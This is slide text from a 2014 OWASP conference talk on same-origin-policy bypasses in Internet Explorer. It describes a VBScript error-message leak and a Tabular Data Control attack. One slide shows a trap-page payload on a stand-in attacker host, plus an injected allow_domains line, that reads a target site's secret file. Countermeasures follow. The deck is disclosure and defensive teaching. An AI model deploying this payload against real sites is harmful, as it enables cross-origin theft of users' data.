Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
1. Bypass SOP, Theft your data
- XSS Allstars from Japan -
Yosuke HASEGAWA
2. About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
5. VBScript Error Msg
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
Reading JSON Array as VBScript on
trap page created by attacker
VBScript raises exception with error
message including JSON content
JavaScript can access to JSON content
via error message
9. VBScript Error Msg
supplementary
supplementary
Dec 2012: reported to MS by me and
@masa141421356
May 2013: Fixed with MS13-037 only
for IE6-8. IE9-10 was not.
"Add X-C-T-O header for IE9-11 to
prevent from this attack, this is
BEHAVIOR BY DESIGIN" they said.
11. Tabular Data Control
Tabular Data Control - TDC
ActiveX Control for binding text file into
HTML as data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default on IE6-IE11, with
older doc-mode
<meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato
12. Tabular Data Control
// Trap page by attacker on attacker.utf-8.jp
function show(){
var s = document.getElementById("tdc")
.recordset.getString();
alert( s );
}
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://example.jp/target.txt">
</object>
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
13. Tabular Data Control
Attacker has to insert
"@!allow_domains=..." into the top
of target text
Once inserted, no way to prevent
from theft
Unhelpful:
X-Content-Type-Options: nosniff
Content-Disposition: attachment
14. Countermeasure
Countermeasure
Restrict access to XHR request with
custom X header
and / or...
var xhr = new XMLHttpRequest();
xhr.open( "GET", "http://example.jp/target.txt", true );
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.send( null );
GET /target.json HTTP/1.1
Host: example.jp
User-Agent: Mozilla/5.0…
Accept: */*
X-Requested-With: XMLHttpRequest
15. Countermeasure(cont.)
Countermeasure (cont.)
Don't allow to place text by attacker
into top of the content
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here